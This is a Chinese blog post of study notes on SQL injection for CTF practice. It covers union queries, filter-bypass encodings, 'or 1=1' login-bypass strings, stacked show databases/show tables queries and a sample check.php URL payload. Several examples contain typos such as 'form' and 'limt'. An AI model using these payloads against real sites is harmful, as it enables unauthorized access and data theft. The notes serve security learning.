在线笔记本

本文介绍了SQL注入的基本概念,展示了如何通过union、空格替换、符号替代等方法构造注入语句,例如使用万能密码'or1=1'。同时提到了信息泄露的常见命令,如show databases和show tables,并讨论了应对过滤和限制的策略。此外,还提醒了正则表达式测试工具regex101.com的重要性以及ASCII码在绕过过滤时的应用。
摘要由CSDN通过智能技术生成

在线笔记本

1.两个select之间,要加个   union    连接
例子1:
select * form * union select * form *
例子2:
select * form * union select 1,2,3,4 #

union 拼接的正确用法:
union select 1,2,3,4 #

【其中的1,2,3 都可以替换成SQL语句。如:(select flag form flag)   注意:要记得加上小括号 】

2.SQL空格替换
%09

%0a

3.#号代替
%23

4.符号替换

(1)
    --     相当于     注释,后面的语句不会再执行
    +    相当于     空格
【注意:--+  一般是一起用的,不然注释可能会不能被识别】

(2)
    #     相当于     “

5.需要访问数据库的:A库B表

select password from  security.users limt 0,3;

【严谨语句如下】
select users.password from  security.users limt 0,3;

【语句解释如下】
查询security数据库users表中,从第一条数据开始查询,查3条,数据内容为 密码

【information这个数据库很重要,往往会用到,要记住】


 
6.正则网站--正则解释

https://regex101.com/

7.被过滤的字词,可以用 ascii码 进行替换 
百度就有转化的


8.SQL万能密码

’ or 1=’1

账号 'or 1=1 #
密码任意


例题:
select name,pass from tbAdmin where name=’admin’ and pass=’123456’

使用万能密码如下
select name,pass from tbAdmin where name=” or 1=’1’ and pass=’123456’


9.基本操作  爆库-报表-
爆库:
;show databases;
爆数据表
;show tables;

10.当||被禁用。
set sql_mode=pipes_as_concat是将||的作用由or变为拼接字符串


11.当flag被过滤
select $_post['query']||flag from Flag【其中$_post['query']】

等同于

select *,1||flag from Flag

12.登陆账号密码的题目----万能登陆语句---使用hackbar--在load URL输入---在XXXX网址后面挂上
XXXX/check.php?username=admin’or’1’=‘1&password=admin’ or ‘1’='1


 

1.

2.

3.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值